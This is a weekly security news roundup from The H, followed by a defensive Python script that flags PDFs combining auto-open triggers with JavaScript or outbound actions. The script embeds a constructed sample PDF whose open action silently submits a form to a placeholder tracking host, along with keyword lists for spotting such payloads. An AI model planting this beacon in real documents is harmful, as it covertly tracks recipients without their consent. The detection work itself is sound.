Lost+Found: accessible pentesting and non-web Persona
Too small for news, but too good to lose, Lost+Found is a compilation of the other stories that have been on The H's radar over the last seven days: non-web Persona use proposed, how to report a DDoS, laptops filled with porn, tracking ships, counting fake callers, PDF receipts, mainframe intrusion, and accessible pentesting...
- Members of the IETF's Network Working Group are currently discussing a draft proposal to make Mozilla's Persona decentralised authentication protocol (aka BrowserID) accessible to locally installed business applications via common interfaces (SASL and GSS-API). At present, Persona can only be used for authentication in web applications.
- ICANN explains how to report a DDoS attack. Very accessible self-help advice.
- If a Chinese national carries a NASA computer, this person must be a spy and the computer must be full of government secrets – or porn.
- Feeling bored? How about tracking ship movements?
- Fake calls from alleged members of Microsoft's tech support are a nuisance. Some time ago, the Internet Storm Center created a form for targeted users in order to find out more about the callers. The current statistical summary: 93% of the phone scammers have an accent, and a total of 82% are male. Only 15% tried to solicit credit card details, but every second caller wanted to use remote management software to establish a connection to the potential victim's computer.
- McAfee reports that a PDF file can use the PDF JavaScript API to call a non-existent URL when it is opened, which works as a covert read receipt: the request never has to succeed, it only has to reach a server the sender controls.
- If you think that mainframe computers are as good as bulletproof, read on: in a report of over 500 pages, Logica has documented a successful intrusion, via the internet, into at least two partitions of an IBM mainframe running z/OS. The attackers say that they harvested parts of the SPAR Swedish Population and Address Register, as well as customer information including credit card details.
- Exemplary: the current version of BackTrack successor Kali Linux offers a speech engine that makes the hacker's Swiss Army knife accessible to visually impaired pentesters.
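The PDF "read receipt" item above is the kind of thing a first-pass triage script catches: a document that carries an automatic trigger (/OpenAction or /AA) together with JavaScript or an outbound action (/SubmitForm, /URI, /Launch). The following is an added example written for this page, not code from McAfee or The H; the sample PDFs and the tracker URL are constructed placeholders. It also decodes #xx hex escapes in PDF names (/J#53 for /JS), a common trick for hiding keywords from naive string scanners.

```python
import re

# Constructed sample: a minimal PDF whose /OpenAction runs JavaScript that
# submits a form to a tracking URL as soon as the document is opened.
# Placeholder document, placeholder URL; not a real malicious sample.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /JavaScript /JS (this.submitForm("http://tracker.example/receipt?doc=42");) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed benign document: no trigger, no script, no URL.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

NAME_RE = re.compile(rb"/([A-Za-z0-9#]+)")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")

TRIGGER_KEYS = [b"/OpenAction", b"/AA"]
PAYLOAD_KEYS = [b"/JS", b"/JavaScript", b"/SubmitForm", b"/URI", b"/Launch"]
OUTBOUND_KEYS = [b"/SubmitForm", b"/URI", b"/Launch"]
URL_RE = re.compile(rb"(?:https?|ftp)://[^\s()<>\"']+")


def normalise_names(data: bytes) -> bytes:
    """Decode #xx hex escapes inside PDF names, so /Open#41ction and /J#53
    are seen as /OpenAction and /JS by the keyword scan below."""
    def decode_name(m):
        decoded = HEX_ESCAPE_RE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(1))
        return b"/" + decoded
    return NAME_RE.sub(decode_name, data)


def count_key(data: bytes, key: bytes) -> int:
    """Count a PDF name key, requiring a non-alphanumeric delimiter after it
    so that /JS does not match inside a longer name."""
    return len(re.findall(re.escape(key) + rb"(?![A-Za-z0-9])", data))


def triage_pdf(data: bytes) -> dict:
    """Return keyword counts, embedded URLs and a verdict: suspicious when an
    automatic trigger is combined with script or an outbound action."""
    data = normalise_names(data)
    counts = {k.decode(): count_key(data, k) for k in TRIGGER_KEYS + PAYLOAD_KEYS}
    urls = sorted({u.decode("latin-1") for u in URL_RE.findall(data)})
    auto_trigger = any(counts[k.decode()] for k in TRIGGER_KEYS)
    has_script = counts["/JS"] > 0 or counts["/JavaScript"] > 0
    outbound = any(counts[k.decode()] for k in OUTBOUND_KEYS) or bool(urls)
    return {
        "keywords": counts,
        "urls": urls,
        "suspicious": bool(auto_trigger and (has_script or outbound)),
    }


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        print(label, triage_pdf(doc))
```

The verdict deliberately requires a trigger plus a payload rather than flagging every /JS, since forms and legitimate interactive documents contain JavaScript too. The scan only sees plaintext objects: real samples often put the action dictionary inside a FlateDecode-compressed object stream, so a production triage pipeline should decompress streams first (tools such as pdfid and pdf-parser do this) and then apply the same logic.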
(sno)